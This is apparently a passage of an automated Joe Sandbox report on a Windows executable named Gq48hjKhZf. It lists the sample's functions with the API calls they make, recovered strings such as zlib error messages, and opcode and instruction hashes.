              • Instruction ID: 7cab8ebf5e8be7cca61280ad2f22e4d1c3948fe97e6d3aaf46f0ca18481b9e55
              • Opcode Fuzzy Hash: 988988ada6dc82bff9e9c7669f10d32680ca5bffd2b02ccc7cf7ef26e6a306a8
              • Instruction Fuzzy Hash: E7317336609B4486DB21CB5AE49035AB7A0F7CCBE8F144216EB8D47B78DF79C691CB40

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: AllocHeap$Value
              • String ID:
              • API String ID: 3898337583-0
              • Opcode ID: 30ed22d9c32a89c2cfd42ea85ebcc15196c91459ae3e4d92826612402d9637be
              • Instruction ID: c44eb9ef2cf98d3488e4d96c7e244cbf8e5b64558ad0ce04898d2a75112beb9a
              • Opcode Fuzzy Hash: 30ed22d9c32a89c2cfd42ea85ebcc15196c91459ae3e4d92826612402d9637be
              • Instruction Fuzzy Hash: 1521A336609B40C6DA25CB5AE89136AB7A1F7CDBD4F108126EB8D87B38DF3DC5518B00

              Control-flow Graph

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: CodeExitProcess
              • String ID: open
              • API String ID: 3861947596-2758837156
              • Opcode ID: 687e6c2363dd86eb31bb0a35d986b928b7956615258b23a1130e50283f5f7496
              • Instruction ID: 9a8e33d82e51c75021cc1a1bc422673ad63e4121514530fd256563005765fdb1
              • Opcode Fuzzy Hash: 687e6c2363dd86eb31bb0a35d986b928b7956615258b23a1130e50283f5f7496
              • Instruction Fuzzy Hash: 6C315E73A19A84D9DA619B6AF8417EE6364F388784F404415FF8D07B6ADF3CC2958B40

              Control-flow Graph

              APIs
                • Part of subcall function 0000000140012060: HeapCreate.KERNEL32 ref: 000000014001206E
                • Part of subcall function 0000000140012060: TlsAlloc.KERNEL32 ref: 000000014001207B
                • Part of subcall function 000000014000C980: HeapCreate.KERNEL32 ref: 000000014000C98E
                • Part of subcall function 000000014000B538: memset.MSVCRT ref: 000000014000B547
                • Part of subcall function 000000014000B538: InitCommonControlsEx.COMCTL32 ref: 000000014000B561
                • Part of subcall function 000000014000B538: CoInitialize.OLE32 ref: 000000014000B569
                • Part of subcall function 00000001400120D0: HeapAlloc.KERNEL32 ref: 0000000140012123
                • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD11
                • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD42
                • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CDB2
                • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D56E
                • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D58F
                • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D5A1
                • Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D476
                • Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D491
                • Part of subcall function 0000000140011D30: HeapAlloc.KERNEL32 ref: 0000000140011D82
                • Part of subcall function 0000000140011D30: memset.MSVCRT ref: 0000000140011DB6
                • Part of subcall function 00000001400120D0: HeapReAlloc.KERNEL32 ref: 0000000140012151
                • Part of subcall function 00000001400120D0: HeapFree.KERNEL32 ref: 0000000140012194
                • Part of subcall function 000000014000C4D0: RemoveVectoredExceptionHandler.KERNEL32 ref: 000000014000C8A5
                • Part of subcall function 000000014000C4D0: AddVectoredExceptionHandler.KERNEL32 ref: 000000014000C8C0
                • Part of subcall function 00000001400121C0: GetLastError.KERNEL32 ref: 00000001400121C4
                • Part of subcall function 00000001400121C0: TlsGetValue.KERNEL32 ref: 00000001400121D4
                • Part of subcall function 00000001400121C0: SetLastError.KERNEL32 ref: 00000001400121F1
                • Part of subcall function 0000000140012210: TlsGetValue.KERNEL32 ref: 0000000140012223
                • Part of subcall function 0000000140012210: HeapAlloc.KERNEL32 ref: 0000000140012266
              • HeapDestroy.KERNEL32 ref: 000000014000124C
              • ExitProcess.KERNEL32 ref: 0000000140001258
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: Heap$Alloc$Free$CreateErrorExceptionHandlerLastValueVectoredmemset$CommonControlsDestroyExitInitInitializeProcessRemove
              • String ID:
              • API String ID: 1207063833-0
              • Opcode ID: da1de5b617aebde20a676659b7b6f93e9ebd451269a6d64086362a559b0bc010
              • Instruction ID: f14933b67cb23f8d7438bd3232522d16ce9264245af44939dd0cca49c0d9e1bd
              • Opcode Fuzzy Hash: da1de5b617aebde20a676659b7b6f93e9ebd451269a6d64086362a559b0bc010
              • Instruction Fuzzy Hash: 7A5108F0A11A4481FA03F7A3F8527E926159B9D7D4F808129BF1D1B3F3DD3A85598B22

              Control-flow Graph

              APIs
                • Part of subcall function 00000001400123E0: TlsGetValue.KERNEL32 ref: 00000001400123F8
              • RemoveDirectoryW.KERNEL32(00000000,?,0000000140003010), ref: 000000014000299C
              • RemoveDirectoryW.KERNEL32(?,0000000140003010), ref: 00000001400029A8
                • Part of subcall function 0000000140007170: WaitForSingleObject.KERNEL32 ref: 0000000140007187
                • Part of subcall function 000000014000720C: TerminateThread.KERNEL32 ref: 0000000140007223
                • Part of subcall function 000000014000720C: EnterCriticalSection.KERNEL32 ref: 0000000140007230
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: DirectoryRemove$CriticalEnterObjectSectionSingleTerminateThreadValueWait
              • String ID:
              • API String ID: 547990026-0
              • Opcode ID: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
              • Instruction ID: 7a41e47de86a43ff34abb2becfbad555fd020f9bfb046cc2ed969e3c0c855493
              • Opcode Fuzzy Hash: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
              • Instruction Fuzzy Hash: 0F01FFF5509B01E5F923BB63BC02BDA6B61E74E3E0F409405BB89131B3DE3DD9849610

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: ExceptionHandlerVectored$Remove
              • String ID:
              • API String ID: 3670940754-0
              • Opcode ID: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
              • Instruction ID: 54ed52b0d94e107c171475cce83a86a7777a808cb3853d4771323e3d57a36066
              • Opcode Fuzzy Hash: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
              • Instruction Fuzzy Hash: 8AF0ED7061370485FE5BDB93B8987F472A0AB4C7C0F184029BB49076719F3C88A48348

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 677 14000da6c-14000da80 679 14000da82-14000da85 677->679 680 14000da9f 677->680 681 14000da92-14000da9d DeleteFileW 679->681 682 14000da87-14000da8c SetFileAttributesW 679->682 683 14000daa1-14000daa6 680->683 681->683 682->681
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: File$AttributesDelete
              • String ID:
              • API String ID: 2910425767-0
              • Opcode ID: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
              • Instruction ID: adf2a79140fabccb03c20fd21f07aa3af446659453137af282c5310bbe8ffc9f
              • Opcode Fuzzy Hash: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
              • Instruction Fuzzy Hash: 48E05BB471910195FB6BD7A778153F521419F8D7D1F184121AB42071B0EF3D44C55222
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: AllocHeap$CreateValue
              • String ID:
              • API String ID: 493873155-0
              • Opcode ID: 1b0d72df29ce6564ac22208b59af7006679a658f7d576f5e4767aae600ecf03e
              • Instruction ID: 1c20f48a7e0d63c5f07c3edeff385a7070e23dcbb2ee76a36a736f2f2e91a8b3
              • Opcode Fuzzy Hash: 1b0d72df29ce6564ac22208b59af7006679a658f7d576f5e4767aae600ecf03e
              • Instruction Fuzzy Hash: F9D0C939A1175092E746AB72A81A3E922A0F75C3C1F901419B70947771DF7E81965A40
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: DestroyFreeHeap
              • String ID:
              • API String ID: 3293292866-0
              • Opcode ID: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
              • Instruction ID: 71a10d3d5b3131d437c50284ad1bfb95f0c128dd24e11de8e9b8b88d768efc2d
              • Opcode Fuzzy Hash: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
              • Instruction Fuzzy Hash: 4CC04C34611400D2E606EB13EC953A42362B79C7C5F801414E70E1B671CE394955E700
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: Heap$AllocFreememset
              • String ID:
              • API String ID: 3063399779-0
              • Opcode ID: a0cc480958914a5b96af09c049cabf50404750236a51b526bc810001df406aed
              • Instruction ID: a75182db50c1f984f89b78753495ac0ab196a1c9ad642d63c8067afd0bb8a22e
              • Opcode Fuzzy Hash: a0cc480958914a5b96af09c049cabf50404750236a51b526bc810001df406aed
              • Instruction Fuzzy Hash: 12213B32605B5086EA1ADB53BC4179AA6A8F7C8FD0F498025AF584BB66DE79C852C340
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: CloseFreeHandleHeap
              • String ID:
              • API String ID: 1642312469-0
              • Opcode ID: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
              • Instruction ID: 5f93da8337f86b39695cad05c5aa1bbbcf0731d39a623fe836b1511b3ba38e21
              • Opcode Fuzzy Hash: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
              • Instruction Fuzzy Hash: AD01FB71614A4081EA56EBA7F5543E96391ABCDBE0F445216BB2E4B7F6DE38C4808740
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: FileWrite
              • String ID:
              • API String ID: 3934441357-0
              • Opcode ID: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
              • Instruction ID: 85eb21683fd68773ec3f68e7974a7ba45b0d300be2a951898864618d3eded784
              • Opcode Fuzzy Hash: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
              • Instruction Fuzzy Hash: D4F030B6624694CBCB10DF39E00166977B0F349B48F200416EF4847764DB36C992CF10
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: Free
              • String ID:
              • API String ID: 3978063606-0
              • Opcode ID: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
              • Instruction ID: 3be53cbf4efc602c07d04e61f546686734bccd281855bf9d316eb8d3f4bb89d6
              • Opcode Fuzzy Hash: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
              • Instruction Fuzzy Hash: E3D0E97091558096F66BA747EC857E422A2B7AC3C5F500419E3050B1B28ABE49DDEA15
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: CurrentDirectory
              • String ID:
              • API String ID: 1611563598-0
              • Opcode ID: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
              • Instruction ID: d26b75307fbf4d2f65b3bf59e092d1c76b80437de534da0d48005b48f8adbafa
              • Opcode Fuzzy Hash: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
              • Instruction Fuzzy Hash: 74C09B74663002C1FA6A936328A97E451905B0C391F504511F7064117089BD14975530
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: CreateHeap
              • String ID:
              • API String ID: 10892065-0
              • Opcode ID: 3010fbf55b21657f3d2da30d78e3fc06337a299998e6cc7e6108e39cc3db3a27
              • Instruction ID: 2c080862c33f0b7fb519294060e944d109da0d65108c87cfa11e07f441f421b0
              • Opcode Fuzzy Hash: 3010fbf55b21657f3d2da30d78e3fc06337a299998e6cc7e6108e39cc3db3a27
              • Instruction Fuzzy Hash: 40C02B34712690C2E3492323AC033991090F34C3C0FD02018F60102770CE3D80A70B00
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: ExceptionHandlerRemoveVectored
              • String ID:
              • API String ID: 1340492425-0
              • Opcode ID: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
              • Instruction ID: 43e8ab96d0ef540813763e0684213002212cef3b8ee59004a75f8fb70944dace
              • Opcode Fuzzy Hash: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
              • Instruction Fuzzy Hash: 30C08C78B03B0085FA4AEB03B8883A422606B8C7C1F800008E60E037328E3C04A54780
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: Window$Message$CreateHeapSend$Freewcslen$Accelerator$LoadMetricsSystemTableTranslate$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundIconLongObjectRegisterStockwcscpy
              • String ID: BUTTON$C$EDIT$P$STATIC$n
              • API String ID: 9748049-1690119102
              • Opcode ID: 3672b20c3f93e9cafd23a15c04167ab05239bdad4ad45a7c7ed3e5f5fd201a6e
              • Instruction ID: 503d67efbf07ff6f248b06a67c50be69490569a40db1ce31eb7df8f18fb995d6
              • Opcode Fuzzy Hash: 3672b20c3f93e9cafd23a15c04167ab05239bdad4ad45a7c7ed3e5f5fd201a6e
              • Instruction Fuzzy Hash: 59D134B5605B4086EB12DB62F8447AA77A5FB8CBC8F404129AF4A47B79DF7DC4498B00
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID:
              • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
              • API String ID: 0-2665694366
              • Opcode ID: 022d8aec80773364c7782894b492e5bf51f6f0f1ab81dba49e519fa5dfe17589
              • Instruction ID: 63a129330255db97eb1aabb126bfc5b4551e8f686405ea2d62c327762663274b
              • Opcode Fuzzy Hash: 022d8aec80773364c7782894b492e5bf51f6f0f1ab81dba49e519fa5dfe17589
              • Instruction Fuzzy Hash: FB620572A106A48BE799CF25D498BED3BF9F748780F518129FB468B7A0E739C845C740
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID:
              • String ID: $header crc mismatch$unknown compression method$unknown header flags set
              • API String ID: 0-4074041902
              • Opcode ID: 678d21ef58d4a875124531cd8bb27c6309f94b37c07dc777e5a796b3eb271508
              • Instruction ID: 440100e0ad3e42c115cce95f3fb78f0a990aae4413b5501bd8dd5ba0711be261
              • Opcode Fuzzy Hash: 678d21ef58d4a875124531cd8bb27c6309f94b37c07dc777e5a796b3eb271508
              • Instruction Fuzzy Hash: 7A02B1726007949BEBA78F16C488BAE3BE9FB4CB94F164518EF894B7A0D775C940C740
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID:
              • String ID: invalid distance code$invalid distance too far back$invalid literal/length code
              • API String ID: 0-3255898291
              • Opcode ID: e9ea9672f90cea75fd930f9b725da38f325f2299c3bc13611abce9c87a4e8c41
              • Instruction ID: 3f1348f65b8f8bda14ba5cdfa7bf6f02fc8c4dbb68883e69d1ec2b1899c7470d
              • Opcode Fuzzy Hash: e9ea9672f90cea75fd930f9b725da38f325f2299c3bc13611abce9c87a4e8c41
              • Instruction Fuzzy Hash: C5D138326186D08BD71A8F3AD8447BD7FA1F3993C4F54811AEB968B791D63DCA4AC700
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID:
              • String ID: incorrect header check$invalid window size$unknown compression method
              • API String ID: 0-1186847913
              • Opcode ID: e5d9ef9cb6cfd683bb0b87efb43f2fbb65f2835d92bd1581f31df26c1c39ce5d
              • Instruction ID: c7f0437dc46e56fef3014f932af091831cb3ca76e565b5a088b3fef6b265a946
              • Opcode Fuzzy Hash: e5d9ef9cb6cfd683bb0b87efb43f2fbb65f2835d92bd1581f31df26c1c39ce5d
              • Instruction Fuzzy Hash: 9391A2726106949BFBA6CF26C584B9E3BA9F70C794F114229EB464BBE1C736D950CB00
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID:
              • String ID: $ $invalid block type
              • API String ID: 0-2056396358
              • Opcode ID: 44e2e5f460598a6c66844f3403f38ee68ad68f3f2a55e5b147868c764788a378
              • Instruction ID: 6826abb0ae9e935998ffe99ae2e08a78a36fe9b187ecd4f73c4f7ab9da41e151
